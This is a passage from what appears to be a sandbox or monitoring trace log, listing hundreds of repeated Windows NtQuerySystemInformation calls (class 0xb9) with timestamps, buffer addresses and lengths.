SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc78, Length=0x58, ResultLength=0x0) [0237.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db40, Length=0x58, ResultLength=0x0) [0237.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x28, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x28, ResultLength=0x0) [0237.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x28, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0237.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db40, Length=0x58, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x28, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x28, ResultLength=0x0) [0237.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x28, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d820, Length=0x20, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x20, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x20, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7a0, Length=0x20, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db40, Length=0x58, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d890, Length=0x28, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d900, Length=0x28, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0237.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0237.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x28, ResultLength=0x0) [0238.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d980, Length=0x28, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0238.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x20, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da60, Length=0x38, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8e0, Length=0x20, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d870, Length=0x20, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7db40, Length=0x58, ResultLength=0x0) [0238.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x28, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x28, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x28, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x28, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8d0, Length=0x28, ResultLength=0x0) [0238.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x28, ResultLength=0x0) [0238.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d950, Length=0x28, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d7c0, Length=0x20, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x20, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x20, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d740, Length=0x20, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d990, Length=0x20, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x20, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x20, ResultLength=0x0) [0238.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d830, Length=0x20, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7da20, Length=0x38, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d8b0, Length=0x20, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d840, Length=0x20, ResultLength=0x0) [0238.175] NtQuerySystemInformation (SystemInformationClass=0xb9, 